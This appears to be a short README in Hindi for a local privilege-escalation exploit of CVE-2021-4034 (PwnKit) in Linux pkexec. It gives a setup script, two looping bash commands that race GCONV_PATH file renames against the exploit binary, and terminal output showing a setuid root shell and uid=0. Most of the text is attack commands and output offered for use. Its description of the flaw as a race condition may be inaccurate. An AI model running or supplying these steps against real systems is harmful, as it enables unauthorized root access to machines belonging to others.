
CVE-2021-4034 (PwnKit) के लिए एक्सप्लॉइट जो Linux सिस्टम पर रूट विशेषाधिकार बढ़ाने के लिए pkexec में रेस कंडीशन का लाभ उठाता है।
Qualys टीम द्वारा pwnkit भेद्यता के लिए एक्सप्लॉइट।
यह एक्सप्लॉइट मानता है कि लक्ष्य मशीन पर gcc मौजूद है।
$ id
uid=1001(ayrx) gid=1002(ayrx) groups=1002(ayrx),27(sudo)
$ ./setup.sh
एक bash सत्र में निम्नलिखित कमांड चलाएँ:
while :; do mv "GCONV_PATH=./value" "GCONV_PATH=./value.bak"; mv "GCONV_PATH=./value.bak" "GCONV_PATH=./value"; done
दूसरे bash सत्र में निम्नलिखित कमांड चलाएँ:
while :; do ./exploit; done
आप अंततः रेस जीत जाएँगे और एक shell बाइनरी प्राप्त करेंगे जो आपको
रूट एक्सेस देती है:
$ ls -lah shell
-rwsrwxrwx 1 root ayrx 16K Jan 26 08:57 shell
$ ./shell
# id
uid=0(root) gid=1002(ayrx) groups=1002(ayrx),27(sudo)
तकनीक पर एक संक्षिप्त लेख मेरे ब्लॉग पर पाया जा सकता है।